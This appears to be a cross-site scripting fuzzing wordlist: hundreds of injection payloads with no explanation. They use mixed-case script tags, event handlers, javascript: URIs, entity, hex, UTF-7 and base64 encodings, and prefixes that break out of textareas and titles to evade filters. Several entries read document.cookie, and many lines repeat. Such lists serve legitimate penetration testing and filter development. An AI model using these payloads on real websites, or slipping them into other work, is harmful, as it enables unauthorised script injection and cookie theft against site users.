

"><sCRipT>alert(123);</sCRipT><input value="
" onmouseover="prompt(1)"/
<svg/onload='alert(1);'>
<svg/onload=';alert(document.domain);'>
<sCRipT>alert('XSS');</sCRipT>
<sCRipT>alert(123);</sCRipT>
</script><svg onload="alert(/x/)"><script>
"><sCRipT>alert('XSS');</sCRipT>
"><sCRipT>alert(123);</sCRipT>
<style TYPE="text/javascript">alert('hello');</style>
"><sCRipT>alert('XSS');</sCRipT><input value="
</textarea><sCRipT>alert('XSS');</sCRipT><textarea rows=1 cols=1>
</textarea><sCRipT>alert(123);</sCRipT><textarea rows=1 cols=1>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></sCRipT>">'><sCRipT>alert(String.fromCharCode(88,83,83))</sCRipT>
(onclick="alert(’XSSRes’))
"><img src=x onerror=alert(document.cookie)>
"/>0\"autofocus/onfocus=alert(/XSSPO SED/)--><video/poster/onerror=prompt(/XSSPOSED/)>"-confirm(/XSSPOSED/)-"
onclick="alert(’XSSRes’)
<input onfocus="prompt(1337)">
<img src="javascript:alert('hello');">
<img src="java&#010;script:alert('hello');">
<img src="java&#X0A;script:alert('hello');">
<IMG SRC="javasCRipT:alert('XSS');">
" +onmouseover%3d'alert(%22xss%22)%3b''=""
</script><script>alert('XSSTARXESED')</script>
<IMG SRC=javasCRipT:alert('XSS')>
<IMG SRC=JaVasCRipT:alert('XSS')>
<IMG SRC=javasCRipT:alert("XSS")>
'">><marquee><h1>XSS</h1></marquee>
" onmouseover="alert(123);" xss="
</sCRipT>">'><sCRipT>prompt(1);</sCRipT>
</title><sCRipT>prompt(1);</sCRipT>
</script><script>prompt(1)</script>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="javasCRipT:alert('XSS');">
<IMG SRC="jav&#x09;asCRipT:alert('XSS');">
<IMG SRC="jav&#x0A;asCRipT:alert('XSS');">
<IMG SRC="jav&#x0D;asCRipT:alert('XSS');">
perl -e 'print "<IMG SRC=java\0sCRipT:alert(\"XSS\")>";' > out
<IMG SRC=" &#14;  javasCRipT:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><input value="
<<sCRipT>alert("XSS");//<</sCRipT>
<img src='zzzz' onerror='alert(1)' />
<IMG SRC="javasCRipT:alert('XSS')"
\";alert('XSS');//
\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e
</TITLE><sCRipT>alert("XSS");</sCRipT><TITLE>
<INPUT TYPE="IMAGE" SRC="javasCRipT:alert('XSS');">
<IMG DYNSRC="javasCRipT:alert('XSS')">
<IMG LOWSRC="javasCRipT:alert('XSS')">
<STYLE>li {list-style-image: url("javasCRipT:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<BGSOUND SRC="javasCRipT:alert('XSS');">
<LINK REL="stylesheet" HREF="javasCRipT:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE type="text/css">BODY{background:url("javasCRipT:alert('XSS')")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
¼sCRipT¾alert(¢XSS¢)¼/sCRipT¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javasCRipT:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javasCRipT:alert('XSS');">
<IFRAME SRC="javasCRipT:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<TABLE BACKGROUND="javasCRipT:alert('XSS')">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-sCRipT+AD4-alert('XSS');+ADw-/sCRipT+AD4-
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<sCRipT>alert('XSS')</sCRipT>">
<sCRipT =">" >alert(123);</sCRipT>
"></textarea>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></sCRipT>">'><sCRipT>alert(String.fromCharCode(88,83,83))</sCRipT><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=javasCRipT:alert('XSS')><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=JaVasCRipT:alert('XSS')><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=javasCRipT:alert("XSS")><textarea rows=1 cols=1><input value="
"></textarea>" onmouseover="alert(123);" xss="<textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav	asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x09;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x0A;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x0D;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea>perl -e 'print "<IMG SRC=java\0sCRipT:alert(\"XSS\")>";' > out<textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=" &#14;  javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><textarea rows=1 cols=1><input value="
"></textarea>"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><input value="<textarea rows=1 cols=1><input value="
"></textarea><<sCRipT>alert("XSS");//<</sCRipT><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="javasCRipT:alert('XSS')"<textarea rows=1 cols=1><input value="
"></textarea>\";alert('XSS');//<textarea rows=1 cols=1><input value="
"></textarea></TITLE><sCRipT>alert("XSS");</sCRipT><TITLE><textarea rows=1 cols=1><input value="
"></textarea><INPUT TYPE="IMAGE" SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG DYNSRC="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><IMG LOWSRC="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><STYLE>li {list-style-image: url("javasCRipT:alert('XSS')");}</STYLE><UL><LI>XSS</br><textarea rows=1 cols=1><input value="
"></textarea><BGSOUND SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><LINK REL="stylesheet" HREF="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><BR SIZE="&{alert('XSS')}"><textarea rows=1 cols=1><input value="
"></textarea><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><textarea rows=1 cols=1><input value="
"></textarea><XSS STYLE="xss:expression(alert('XSS'))"><textarea rows=1 cols=1><input value="
"></textarea><STYLE type="text/css">BODY{background:url("javasCRipT:alert('XSS')")}</STYLE><textarea rows=1 cols=1><input value="
"></textarea><XSS STYLE="behavior: url(xss.htc);"><textarea rows=1 cols=1><input value="
"></textarea>¼sCRipT¾alert(¢XSS¢)¼/sCRipT¾<textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0;url=javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IFRAME SRC="javasCRipT:alert('XSS');"></IFRAME><textarea rows=1 cols=1><input value="
"></textarea><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME><textarea rows=1 cols=1><input value="
"></textarea><TABLE BACKGROUND="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><textarea rows=1 cols=1><input value="
"></textarea> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-sCRipT+AD4-alert('XSS');+ADw-/sCRipT+AD4-<textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="Set-Cookie" Content="USERID=<sCRipT>alert('XSS')</sCRipT>"><textarea rows=1 cols=1><input value="
"></textarea><sCRipT =">" >alert(123);</sCRipT><textarea rows=1 cols=1><input value="
<sCRip<script>T>alert('XSS');</sCRip<script>T>
<sCRip<script>T>alert(123);</sCRip<script>T>
"><sCRip<script>T>alert('XSS');</sCRip<script>T>
"><sCRip<script>T>alert(123);</sCRip<script>T>
"><sCRip<script>T>alert('XSS');</sCRip<script>T><input value="
"><sCRip<script>T>alert(123);</sCRip<script>T><input value="
</textarea><sCRip<script>T>alert('XSS');</sCRip<script>T><textarea rows=1 cols=1>
</textarea><sCRip<script>T>alert(123);</sCRip<script>T><textarea rows=1 cols=1>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></sCRip<script>T>">'><sCRip<script>T>alert(String.fromCharCode(88,83,83))</sCRip<script>T>
<IMG SRC="javasCRipT:alert('XSS');">
<IMG SRC=javasCRipT:alert('XSS')>
<IMG SRC=JaVasCRipT:alert('XSS')>
<IMG SRC=javasCRipT:alert("XSS")>
" onmouseover="alert(123);" xss="
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	asCRipT:alert('XSS');">
<IMG SRC="jav&#x09;asCRipT:alert('XSS');">
<IMG SRC="jav&#x0A;asCRipT:alert('XSS');">
<IMG SRC="jav&#x0D;asCRipT:alert('XSS');">
perl -e 'print "<IMG SRC=java\0sCRipT:alert(\"XSS\")>";' > out
<IMG SRC=" &#14;  javasCRipT:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><input value="
<<sCRip<script>T>alert("XSS");//<</sCRip<script>T>
<IMG SRC="javasCRipT:alert('XSS')"
\";alert('XSS');//
</TITLE><sCRip<script>T>alert("XSS");</sCRip<script>T><TITLE>
<INPUT TYPE="IMAGE" SRC="javasCRipT:alert('XSS');">
<IMG DYNSRC="javasCRipT:alert('XSS')">
<IMG LOWSRC="javasCRipT:alert('XSS')">
<STYLE>li {list-style-image: url("javasCRipT:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<BGSOUND SRC="javasCRipT:alert('XSS');">
<LINK REL="stylesheet" HREF="javasCRipT:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE type="text/css">BODY{background:url("javasCRipT:alert('XSS')")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
¼sCRipT¾alert(¢XSS¢)¼/sCRipT¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javasCRipT:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javasCRipT:alert('XSS');">
<IFRAME SRC="javasCRipT:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<TABLE BACKGROUND="javasCRipT:alert('XSS')">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-sCRipT+AD4-alert('XSS');+ADw-/sCRipT+AD4-
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<sCRip<script>T>alert('XSS')</sCRip<script>T>">
<sCRipT =">" >alert(123);</sCRip<script>T>
"></textarea>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></sCRip<script>T>">'><sCRip<script>T>alert(String.fromCharCode(88,83,83))</sCRip<script>T><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=javasCRipT:alert('XSS')><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=JaVasCRipT:alert('XSS')><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=javasCRipT:alert("XSS")><textarea rows=1 cols=1><input value="
"></textarea>" onmouseover="alert(123);" xss="<textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav	asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x09;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x0A;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="jav&#x0D;asCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea>perl -e 'print "<IMG SRC=java\0sCRipT:alert(\"XSS\")>";' > out<textarea rows=1 cols=1><input value="
"></textarea><IMG SRC=" &#14;  javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><textarea rows=1 cols=1><input value="
"></textarea>"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><input value="<textarea rows=1 cols=1><input value="
"></textarea><<sCRip<script>T>alert("XSS");//<</sCRip<script>T><textarea rows=1 cols=1><input value="
"></textarea><IMG SRC="javasCRipT:alert('XSS')"<textarea rows=1 cols=1><input value="
"></textarea>\";alert('XSS');//<textarea rows=1 cols=1><input value="
"></textarea></TITLE><sCRip<script>T>alert("XSS");</sCRip<script>T><TITLE><textarea rows=1 cols=1><input value="
"></textarea><INPUT TYPE="IMAGE" SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IMG DYNSRC="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><IMG LOWSRC="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><STYLE>li {list-style-image: url("javasCRipT:alert('XSS')");}</STYLE><UL><LI>XSS</br><textarea rows=1 cols=1><input value="
"></textarea><BGSOUND SRC="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><LINK REL="stylesheet" HREF="javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><BR SIZE="&{alert('XSS')}"><textarea rows=1 cols=1><input value="
"></textarea><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><textarea rows=1 cols=1><input value="
"></textarea><XSS STYLE="xss:expression(alert('XSS'))"><textarea rows=1 cols=1><input value="
"></textarea><STYLE type="text/css">BODY{background:url("javasCRipT:alert('XSS')")}</STYLE><textarea rows=1 cols=1><input value="
"></textarea><XSS STYLE="behavior: url(xss.htc);"><textarea rows=1 cols=1><input value="
"></textarea>¼sCRipT¾alert(¢XSS¢)¼/sCRipT¾<textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0;url=javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javasCRipT:alert('XSS');"><textarea rows=1 cols=1><input value="
"></textarea><IFRAME SRC="javasCRipT:alert('XSS');"></IFRAME><textarea rows=1 cols=1><input value="
"></textarea><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME><textarea rows=1 cols=1><input value="
"></textarea><TABLE BACKGROUND="javasCRipT:alert('XSS')"><textarea rows=1 cols=1><input value="
"></textarea><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><textarea rows=1 cols=1><input value="
"></textarea> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-sCRipT+AD4-alert('XSS');+ADw-/sCRipT+AD4-<textarea rows=1 cols=1><input value="
"></textarea><META HTTP-EQUIV="Set-Cookie" Content="USERID=<sCRip<script>T>alert('XSS')</sCRip<script>T>"><textarea rows=1 cols=1><input value="
"></textarea><sCRipT =">" >alert(123);</sCRip<script>T><textarea rows=1 cols=1><input value=""></textarea><sCRipT =">" >alert(123);</sCRip<script>T><textarea rows=1 cols=1><input value=""></textarea><sCRipT =">" >alert(123);</sCRip<script>T><textarea rows=1 cols=1><input value="
